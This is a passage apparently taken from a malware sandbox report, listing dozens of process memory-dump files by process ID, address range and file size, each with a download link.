memory/3548-16-0x00007FFD8B850000-0x00007FFD8BA45000-memory.dmp

Filesize
2.0MB

Download
memory/3548-9-0x00007FFD8B8ED000-0x00007FFD8B8EE000-memory.dmp

Filesize
4KB

Download
memory/3548-18-0x00007FFD8B850000-0x00007FFD8BA45000-memory.dmp

Filesize
2.0MB

Download
memory/3548-19-0x00007FFD8B850000-0x00007FFD8BA45000-memory.dmp

Filesize
2.0MB

Download
memory/3548-8-0x00007FFD4B8D0000-0x00007FFD4B8E0000-memory.dmp

Filesize
64KB

Download
memory/3548-21-0x00007FFD8B850000-0x00007FFD8BA45000-memory.dmp

Filesize
2.0MB

Download
memory/3548-17-0x00007FFD8B850000-0x00007FFD8BA45000-memory.dmp

Filesize
2.0MB

Download
memory/3548-24-0x00007FFD8B850000-0x00007FFD8BA45000-memory.dmp

Filesize
2.0MB

Download
memory/3548-25-0x00007FFD8B850000-0x00007FFD8BA45000-memory.dmp

Filesize
2.0MB

Download
memory/3548-23-0x00007FFD8B850000-0x00007FFD8BA45000-memory.dmp

Filesize
2.0MB

Download
memory/3548-13-0x00007FFD8B850000-0x00007FFD8BA45000-memory.dmp

Filesize
2.0MB

Download
memory/3548-27-0x00007FFD8B850000-0x00007FFD8BA45000-memory.dmp

Filesize
2.0MB

Download
memory/3548-137-0x00007FFD8B850000-0x00007FFD8BA45000-memory.dmp

Filesize
2.0MB

Download
memory/3548-26-0x00007FFD493C0000-0x00007FFD493D0000-memory.dmp

Filesize
64KB

Download
memory/3548-139-0x00007FFD8B850000-0x00007FFD8BA45000-memory.dmp

Filesize
2.0MB

Download
memory/3548-12-0x00007FFD4B8D0000-0x00007FFD4B8E0000-memory.dmp

Filesize
64KB

Download
memory/3548-20-0x00007FFD493C0000-0x00007FFD493D0000-memory.dmp

Filesize
64KB

Download
memory/3548-138-0x00007FFD8B8ED000-0x00007FFD8B8EE000-memory.dmp

Filesize
4KB

Download
memory/3548-146-0x00007FFD8B850000-0x00007FFD8BA45000-memory.dmp

Filesize
2.0MB

Download
memory/3548-14-0x00007FFD8B850000-0x00007FFD8BA45000-memory.dmp

Filesize
2.0MB

Download
memory/3548-141-0x00007FFD8B850000-0x00007FFD8BA45000-memory.dmp

Filesize
2.0MB

Download
memory/3548-140-0x00007FFD8B850000-0x00007FFD8BA45000-memory.dmp

Filesize
2.0MB

Download
memory/3956-72-0x0000000000400000-0x00000000004F4000-memory.dmp

Filesize
976KB

Download
memory/4680-3822-0x0000000000400000-0x00000000004F4000-memory.dmp

Filesize
976KB

Download
memory/5216-3835-0x0000000000400000-0x00000000004F4000-memory.dmp

Filesize
976KB

Download
memory/5504-3859-0x0000000000400000-0x00000000004F4000-memory.dmp

Filesize
976KB

Download
memory/5540-3866-0x0000000000400000-0x00000000004F4000-memory.dmp

Filesize
976KB

Download
memory/5656-3904-0x0000000000400000-0x00000000004F4000-memory.dmp

Filesize
976KB

Download
memory/5656-3903-0x0000000000400000-0x00000000004F4000-memory.dmp

Filesize
976KB

Download
memory/5704-3912-0x0000000000400000-0x00000000004F4000-memory.dmp

Filesize
976KB

Download
memory/5836-3930-0x0000000000400000-0x00000000004F4000-memory.dmp

Filesize
976KB

Download
memory/5836-3932-0x0000000000400000-0x00000000004F4000-memory.dmp

Filesize
976KB

Download
memory/5852-3936-0x0000000000400000-0x00000000004F4000-memory.dmp

Filesize
976KB

Download
memory/5900-3941-0x0000000000400000-0x00000000004F4000-memory.dmp

Filesize
976KB

Download